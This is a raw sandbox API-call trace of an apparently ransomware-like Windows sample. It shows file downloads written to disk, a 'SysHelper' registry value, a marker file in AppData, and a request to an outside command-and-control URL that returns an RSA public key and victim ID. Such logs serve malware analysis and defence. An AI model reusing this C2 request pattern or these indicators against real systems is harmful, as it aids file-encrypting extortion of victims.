InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x915d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x915d6d8 | out: lpBuffer=0x915d778*, lpdwNumberOfBytesRead=0x915d6d8*=0x2800) returned 1 [0106.652] WriteFile (in: hFile=0x2a4, lpBuffer=0x915d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x915d6dc, lpOverlapped=0x0 | out: lpBuffer=0x915d778*, lpNumberOfBytesWritten=0x915d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0106.653] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x915d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x915d6d8 | out: lpBuffer=0x915d778*, lpdwNumberOfBytesRead=0x915d6d8*=0x2800) returned 1 [0106.935] WriteFile (in: hFile=0x2a4, lpBuffer=0x915d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x915d6dc, lpOverlapped=0x0 | out: lpBuffer=0x915d778*, lpNumberOfBytesWritten=0x915d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0106.935] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x915d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x915d6d8 | out: lpBuffer=0x915d778*, lpdwNumberOfBytesRead=0x915d6d8*=0x2800) returned 1 [0107.221] WriteFile (in: hFile=0x2a4, lpBuffer=0x915d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x915d6dc, lpOverlapped=0x0 | out: lpBuffer=0x915d778*, lpNumberOfBytesWritten=0x915d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0107.222] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x915d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x915d6d8 | out: lpBuffer=0x915d778*, lpdwNumberOfBytesRead=0x915d6d8*=0x2800) returned 1 [0107.582] WriteFile (in: hFile=0x2a4, lpBuffer=0x915d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x915d6dc, lpOverlapped=0x0 | out: lpBuffer=0x915d778*, lpNumberOfBytesWritten=0x915d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0107.583] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x915d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x915d6d8 | out: lpBuffer=0x915d778*, lpdwNumberOfBytesRead=0x915d6d8*=0x2800) returned 1 [0107.945] WriteFile (in: hFile=0x2a4, lpBuffer=0x915d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x915d6dc, lpOverlapped=0x0 | out: lpBuffer=0x915d778*, lpNumberOfBytesWritten=0x915d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0107.946] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x915d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x915d6d8 | out: lpBuffer=0x915d778*, lpdwNumberOfBytesRead=0x915d6d8*=0x2800) returned 1 [0108.358] WriteFile (in: hFile=0x2a4, lpBuffer=0x915d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x915d6dc, lpOverlapped=0x0 | out: lpBuffer=0x915d778*, lpNumberOfBytesWritten=0x915d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0108.359] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x915d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x915d6d8 | out: lpBuffer=0x915d778*, lpdwNumberOfBytesRead=0x915d6d8*=0x2800) returned 1 [0108.359] WriteFile (in: hFile=0x2a4, lpBuffer=0x915d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x915d6dc, lpOverlapped=0x0 | out: lpBuffer=0x915d778*, lpNumberOfBytesWritten=0x915d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0108.360] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x915d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x915d6d8 | out: lpBuffer=0x915d778*, lpdwNumberOfBytesRead=0x915d6d8*=0x2800) returned 1 [0108.645] WriteFile (in: hFile=0x2a4, lpBuffer=0x915d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x915d6dc, lpOverlapped=0x0 | out: lpBuffer=0x915d778*, lpNumberOfBytesWritten=0x915d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0108.645] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x915d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x915d6d8 | out: lpBuffer=0x915d778*, lpdwNumberOfBytesRead=0x915d6d8*=0x2800) returned 1 [0109.050] WriteFile (in: hFile=0x2a4, lpBuffer=0x915d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x915d6dc, lpOverlapped=0x0 | out: lpBuffer=0x915d778*, lpNumberOfBytesWritten=0x915d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0109.050] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x915d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x915d6d8 | out: lpBuffer=0x915d778*, lpdwNumberOfBytesRead=0x915d6d8*=0x2800) returned 1 [0109.051] WriteFile (in: hFile=0x2a4, lpBuffer=0x915d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x915d6dc, lpOverlapped=0x0 | out: lpBuffer=0x915d778*, lpNumberOfBytesWritten=0x915d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0109.052] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x915d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x915d6d8 | out: lpBuffer=0x915d778*, lpdwNumberOfBytesRead=0x915d6d8*=0x2800) returned 1 [0109.337] WriteFile (in: hFile=0x2a4, lpBuffer=0x915d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x915d6dc, lpOverlapped=0x0 | out: lpBuffer=0x915d778*, lpNumberOfBytesWritten=0x915d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0109.337] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x915d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x915d6d8 | out: lpBuffer=0x915d778*, lpdwNumberOfBytesRead=0x915d6d8*=0x2800) returned 1 [0109.620] WriteFile (in: hFile=0x2a4, lpBuffer=0x915d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x915d6dc, lpOverlapped=0x0 | out: lpBuffer=0x915d778*, lpNumberOfBytesWritten=0x915d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0109.620] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x915d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x915d6d8 | out: lpBuffer=0x915d778*, lpdwNumberOfBytesRead=0x915d6d8*=0x2800) returned 1 [0109.621] WriteFile (in: hFile=0x2a4, lpBuffer=0x915d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x915d6dc, lpOverlapped=0x0 | out: lpBuffer=0x915d778*, lpNumberOfBytesWritten=0x915d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0109.621] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x915d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x915d6d8 | out: lpBuffer=0x915d778*, lpdwNumberOfBytesRead=0x915d6d8*=0x2800) returned 1 [0109.900] WriteFile (in: hFile=0x2a4, lpBuffer=0x915d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x915d6dc, lpOverlapped=0x0 | out: lpBuffer=0x915d778*, lpNumberOfBytesWritten=0x915d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0109.900] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x915d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x915d6d8 | out: lpBuffer=0x915d778*, lpdwNumberOfBytesRead=0x915d6d8*=0x2800) returned 1 [0109.903] WriteFile (in: hFile=0x2a4, lpBuffer=0x915d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x915d6dc, lpOverlapped=0x0 | out: lpBuffer=0x915d778*, lpNumberOfBytesWritten=0x915d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0109.904] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x915d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x915d6d8 | out: lpBuffer=0x915d778*, lpdwNumberOfBytesRead=0x915d6d8*=0x2800) returned 1 [0110.187] WriteFile (in: hFile=0x2a4, lpBuffer=0x915d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x915d6dc, lpOverlapped=0x0 | out: lpBuffer=0x915d778*, lpNumberOfBytesWritten=0x915d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0110.187] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x915d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x915d6d8 | out: lpBuffer=0x915d778*, lpdwNumberOfBytesRead=0x915d6d8*=0x2800) returned 1 [0110.188] WriteFile (in: hFile=0x2a4, lpBuffer=0x915d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x915d6dc, lpOverlapped=0x0 | out: lpBuffer=0x915d778*, lpNumberOfBytesWritten=0x915d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0110.188] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x915d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x915d6d8 | out: lpBuffer=0x915d778*, lpdwNumberOfBytesRead=0x915d6d8*=0x2800) returned 1 [0110.471] WriteFile (in: hFile=0x2a4, lpBuffer=0x915d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x915d6dc, lpOverlapped=0x0 | out: lpBuffer=0x915d778*, lpNumberOfBytesWritten=0x915d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0110.472] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x915d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x915d6d8 | out: lpBuffer=0x915d778*, lpdwNumberOfBytesRead=0x915d6d8*=0x2800) returned 1 [0110.758] WriteFile (in: hFile=0x2a4, lpBuffer=0x915d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x915d6dc, lpOverlapped=0x0 | out: lpBuffer=0x915d778*, lpNumberOfBytesWritten=0x915d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0110.758] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x915d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x915d6d8 | out: lpBuffer=0x915d778*, lpdwNumberOfBytesRead=0x915d6d8*=0x2800) returned 1 [0110.759] WriteFile (in: hFile=0x2a4, lpBuffer=0x915d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x915d6dc, lpOverlapped=0x0 | out: lpBuffer=0x915d778*, lpNumberOfBytesWritten=0x915d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0110.760] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x915d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x915d6d8 | out: lpBuffer=0x915d778*, lpdwNumberOfBytesRead=0x915d6d8*=0x2800) returned 1 [0111.819] WriteFile (in: hFile=0x2a4, lpBuffer=0x915d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x915d6dc, lpOverlapped=0x0 | out: lpBuffer=0x915d778*, lpNumberOfBytesWritten=0x915d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0111.819] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x915d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x915d6d8 | out: lpBuffer=0x915d778*, lpdwNumberOfBytesRead=0x915d6d8*=0x2800) returned 1 [0111.821] WriteFile (in: hFile=0x2a4, lpBuffer=0x915d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x915d6dc, lpOverlapped=0x0 | out: lpBuffer=0x915d778*, lpNumberOfBytesWritten=0x915d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0111.821] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x915d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x915d6d8 | out: lpBuffer=0x915d778*, lpdwNumberOfBytesRead=0x915d6d8*=0x2800) returned 1 [0112.531] WriteFile (in: hFile=0x2a4, lpBuffer=0x915d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x915d6dc, lpOverlapped=0x0 | out: lpBuffer=0x915d778*, lpNumberOfBytesWritten=0x915d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0112.532] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x915d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x915d6d8 | out: lpBuffer=0x915d778*, lpdwNumberOfBytesRead=0x915d6d8*=0x2800) returned 1 [0113.013] WriteFile (in: hFile=0x2a4, lpBuffer=0x915d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x915d6dc, lpOverlapped=0x0 | out: lpBuffer=0x915d778*, lpNumberOfBytesWritten=0x915d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0113.013] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x915d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x915d6d8 | out: lpBuffer=0x915d778*, lpdwNumberOfBytesRead=0x915d6d8*=0x2800) returned 1 [0113.305] WriteFile (in: hFile=0x2a4, lpBuffer=0x915d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x915d6dc, lpOverlapped=0x0 | out: lpBuffer=0x915d778*, lpNumberOfBytesWritten=0x915d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0113.306] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x915d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x915d6d8 | out: lpBuffer=0x915d778*, lpdwNumberOfBytesRead=0x915d6d8*=0x2800) returned 1 [0113.307] WriteFile (in: hFile=0x2a4, lpBuffer=0x915d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x915d6dc, lpOverlapped=0x0 | out: lpBuffer=0x915d778*, lpNumberOfBytesWritten=0x915d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0113.307] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x915d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x915d6d8 | out: lpBuffer=0x915d778*, lpdwNumberOfBytesRead=0x915d6d8*=0x2800) returned 1 [0113.657] WriteFile (in: hFile=0x2a4, lpBuffer=0x915d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x915d6dc, lpOverlapped=0x0 | out: lpBuffer=0x915d778*, lpNumberOfBytesWritten=0x915d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0113.657] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x915d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x915d6d8 | out: lpBuffer=0x915d778*, lpdwNumberOfBytesRead=0x915d6d8*=0x2800) returned 1 [0113.937] WriteFile (in: hFile=0x2a4, lpBuffer=0x915d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x915d6dc, lpOverlapped=0x0 | out: lpBuffer=0x915d778*, lpNumberOfBytesWritten=0x915d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0113.938] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x915d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x915d6d8 | out: lpBuffer=0x915d778*, lpdwNumberOfBytesRead=0x915d6d8*=0x2800) returned 1 [0114.226] WriteFile (in: hFile=0x2a4, lpBuffer=0x915d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x915d6dc, lpOverlapped=0x0 | out: lpBuffer=0x915d778*, lpNumberOfBytesWritten=0x915d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0114.227] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x915d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x915d6d8 | out: lpBuffer=0x915d778*, lpdwNumberOfBytesRead=0x915d6d8*=0x2800) returned 1 [0114.227] WriteFile (in: hFile=0x2a4, lpBuffer=0x915d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x915d6dc, lpOverlapped=0x0 | out: lpBuffer=0x915d778*, lpNumberOfBytesWritten=0x915d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0114.228] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x915d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x915d6d8 | out: lpBuffer=0x915d778*, lpdwNumberOfBytesRead=0x915d6d8*=0x2800) returned 1 [0114.514] WriteFile (in: hFile=0x2a4, lpBuffer=0x915d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x915d6dc, lpOverlapped=0x0 | out: lpBuffer=0x915d778*, lpNumberOfBytesWritten=0x915d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0114.515] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x915d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x915d6d8 | out: lpBuffer=0x915d778*, lpdwNumberOfBytesRead=0x915d6d8*=0x2800) returned 1 [0114.801] WriteFile (in: hFile=0x2a4, lpBuffer=0x915d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x915d6dc, lpOverlapped=0x0 | out: lpBuffer=0x915d778*, lpNumberOfBytesWritten=0x915d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0114.801] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x915d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x915d6d8 | out: lpBuffer=0x915d778*, lpdwNumberOfBytesRead=0x915d6d8*=0x2800) returned 1 [0114.803] WriteFile (in: hFile=0x2a4, lpBuffer=0x915d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x915d6dc, lpOverlapped=0x0 | out: lpBuffer=0x915d778*, lpNumberOfBytesWritten=0x915d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0114.803] InternetReadFile (hFile=0xcc000c, lpBuffer=0x915d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x915d6d8) Thread: id = 75 os_tid = 0xf50 [0100.248] timeGetTime () returned 0xe68d44 [0100.248] GetLastError () returned 0x54f [0100.248] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x3bc) returned 0x2be8190 [0100.248] GetCurrentThreadId () returned 0xf50 [0100.248] SetLastError (dwErrCode=0x54f) [0100.271] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", ulOptions=0x0, samDesired=0xf003f, phkResult=0xf35a5e4 | out: phkResult=0xf35a5e4*=0x534) returned 0x0 [0100.271] RegQueryValueExW (in: hKey=0x534, lpValueName="SysHelper", lpReserved=0x0, lpType=0xf35a5d8, lpData=0xf35a5e0, lpcbData=0xf35a5dc*=0x4 | out: lpType=0xf35a5d8*=0x0, lpData=0xf35a5e0*=0x0, lpcbData=0xf35a5dc*=0x4) returned 0x2 [0100.272] RegSetValueExW (in: hKey=0x534, lpValueName="SysHelper", Reserved=0x0, dwType=0x4, lpData=0xf35a5e0*=0x1, cbData=0x4 | out: lpData=0xf35a5e0*=0x1) returned 0x0 [0100.272] RegCloseKey (hKey=0x534) returned 0x0 [0100.272] SHGetFolderPathA (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0xf35a4e4 | out: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local") returned 0x0 [0100.272] PathAppendA (in: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local", pMore="bowsakkdestx.txt" | out: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local\\bowsakkdestx.txt") returned 1 [0100.272] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x18) returned 0x2b846c8 [0100.294] AreFileApisANSI () returned 1 [0100.294] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xf35a4e4, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 50 [0100.294] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x64) returned 0x649b88 [0100.294] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xf35a4e4, cbMultiByte=-1, lpWideCharStr=0x649b88, cchWideChar=50 | out: lpWideCharStr="C:\\Users\\kEecfMwgj\\AppData\\Local\\bowsakkdestx.txt") returned 50 [0100.316] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\bowsakkdestx.txt" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\bowsakkdestx.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xf35a368, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0100.316] GetLastError () returned 0x2 [0100.316] GetLastError () returned 0x2 [0100.316] SetLastError (dwErrCode=0x2) [0100.316] GetLastError () returned 0x2 [0100.316] SetLastError (dwErrCode=0x2) [0100.316] GetLastError () returned 0x2 [0100.316] SetLastError (dwErrCode=0x2) [0100.323] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x649b88 | out: hHeap=0x5f0000) returned 1 [0100.324] InternetOpenW (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0010 [0100.324] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x50) returned 0x2ba7278 [0100.324] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x30) returned 0x2b6b090 [0100.324] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x840) returned 0x2be1e58 [0100.324] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2b6b090, cbMultiByte=-1, lpWideCharStr=0x2be1e58, cchWideChar=1056 | out: lpWideCharStr="DEC2E953FC80DE582D412ECFEAA51D7B") returned 33 [0100.324] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x850) returned 0x2be26a0 [0100.324] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2be1e58 | out: hHeap=0x5f0000) returned 1 [0100.325] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2b6b090 | out: hHeap=0x5f0000) returned 1 [0100.325] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x890) returned 0x2bf0350 [0100.325] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2ba7278 | out: hHeap=0x5f0000) returned 1 [0100.325] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2be26a0 | out: hHeap=0x5f0000) returned 1 [0100.325] lstrcpyW (in: lpString1=0xf35af78, lpString2="http://acacaca.org/test2/get.php?pid=DEC2E953FC80DE582D412ECFEAA51D7B" | out: lpString1="http://acacaca.org/test2/get.php?pid=DEC2E953FC80DE582D412ECFEAA51D7B") returned="http://acacaca.org/test2/get.php?pid=DEC2E953FC80DE582D412ECFEAA51D7B" [0100.325] lstrcatW (in: lpString1="http://acacaca.org/test2/get.php?pid=DEC2E953FC80DE582D412ECFEAA51D7B", lpString2="&first=true" | out: lpString1="http://acacaca.org/test2/get.php?pid=DEC2E953FC80DE582D412ECFEAA51D7B&first=true") returned="http://acacaca.org/test2/get.php?pid=DEC2E953FC80DE582D412ECFEAA51D7B&first=true" [0100.326] InternetOpenUrlW (hInternet=0xcc0010, lpszUrl="http://acacaca.org/test2/get.php?pid=DEC2E953FC80DE582D412ECFEAA51D7B&first=true", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) returned 0xcc0018 [0101.114] InternetReadFile (in: hFile=0xcc0018, lpBuffer=0xf35a778, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xf35a604 | out: lpBuffer=0xf35a778*, lpdwNumberOfBytesRead=0xf35a604*=0x22d) returned 1 [0101.115] SHGetFolderPathA (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0xf35a670 | out: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local") returned 0x0 [0101.115] PathAppendA (in: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local", pMore="bowsakkdestx.txt" | out: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local\\bowsakkdestx.txt") returned 1 [0101.115] AreFileApisANSI () returned 1 [0101.115] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xf35a670, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 50 [0101.115] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x64) returned 0x649bf8 [0101.115] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xf35a670, cbMultiByte=-1, lpWideCharStr=0x649bf8, cchWideChar=50 | out: lpWideCharStr="C:\\Users\\kEecfMwgj\\AppData\\Local\\bowsakkdestx.txt") returned 50 [0101.115] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\bowsakkdestx.txt" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\bowsakkdestx.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0xf35a47c, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2b8 [0101.116] GetFileType (hFile=0x2b8) returned 0x1 [0101.116] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x649bf8 | out: hHeap=0x5f0000) returned 1 [0101.117] lstrlenA (lpString="{\"public_key\":\"-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 557 [0101.117] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1000) returned 0x2bf1570 [0101.117] WriteFile (in: hFile=0x2b8, lpBuffer=0xf359118*, nNumberOfBytesToWrite=0x22d, lpNumberOfBytesWritten=0xf358a44, lpOverlapped=0x0 | out: lpBuffer=0xf359118*, lpNumberOfBytesWritten=0xf358a44*=0x22d, lpOverlapped=0x0) returned 1 [0102.431] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2bf1570 | out: hHeap=0x5f0000) returned 1 [0102.431] CloseHandle (hObject=0x2b8) returned 1 [0102.433] InternetCloseHandle (hInternet=0xcc0018) returned 1 [0102.436] InternetCloseHandle (hInternet=0xcc0010) returned 1 [0102.436] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2bf0350 | out: hHeap=0x5f0000) returned 1 [0102.436] lstrlenA (lpString="{\"public_key\":\"") returned 15 [0102.436] lstrcpyA (in: lpString1=0xf35ab78, lpString2="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}" | out: lpString1="-----BEGIN PUBLIC 